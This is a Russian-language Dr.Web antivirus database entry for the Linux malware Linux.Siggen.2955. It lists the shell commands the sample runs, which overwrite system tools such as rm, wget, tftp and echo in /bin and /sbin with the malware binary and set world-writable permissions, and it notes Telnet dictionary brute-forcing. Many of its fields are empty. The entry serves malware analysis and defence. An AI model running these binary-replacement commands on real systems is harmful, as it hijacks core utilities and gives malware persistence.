Linux.Siggen.2955

Linux.Siggen.2955

Добавлен в вирусную базу Dr.Web: 2020-05-16

Описание добавлено: 2020-05-16

Вредоносные функции:

Запускает себя в качестве демона

Подменяет имя приложения на:

Заменяет следующие системные файлы:

Запускает процессы:

sh -c mkdir app && >app/lib && cd app/lib; mv <SAMPLE_FULL_PATH> app/lib; chmod 777 app/lib
mkdir app
mv <SAMPLE_FULL_PATH> app/lib
chmod 777 app/lib
sh -c cd /bin/; cat tftp > tftp-cpy; cat /proc/580/exe > tftp ; chmod 777 tftp
cat tftp
cat /proc/580/exe
chmod 777 tftp
sh -c cd /bin/; cat rm > rm-cpy; cat /proc/580/exe > rm ; chmod 777 rm
cat rm
chmod 777 rm
sh -c cd /bin/; cat cd > cd-cpy; cat /proc/580/exe > cd ; chmod 777 cd
cat cd
chmod 777 cd
sh -c cd /bin/; cat wget > wget-cpy; cat /proc/580/exe > wget ; chmod 777 wget
cat wget
chmod 777 wget
sh -c cd /bin/; cat echo > echo-cpy; cat /proc/580/exe > echo ; chmod 777 echo
cat echo
chmod 777 echo
sh -c cd /sbin/; cat tftp > tftp-cpy; cat /proc/580/exe > tftp ; chmod 777 tftp
sh -c cd /sbin/; cat rm > rm-cpy; cat /proc/580/exe > rm ; chmod 777 rm
sh -c cd /sbin/; cat cd > cd-cpy; cat /proc/580/exe > cd ; chmod 777 cd
sh -c cd /sbin/; cat wget > wget-cpy; cat /proc/580/exe > wget ; chmod 777 wget
sh -c cd /sbin/; cat echo > echo-cpy; cat /proc/580/exe > echo ; chmod 777 echo

Завершает системные процессы:

Завершает следующие процессы:

Выполняет операции с файловой системой:

Модифицирует права доступа к файлам:

Создает папки:

Создает или модифицирует файлы:

Сетевая активность:

Ожидает входящих соединений на портах:

Устанавливает соединение:

Проводит атаку перебором по словарю (брутфорс) по протоколу Telnet.

DNS ASK:

Посылает данные следующим серверам: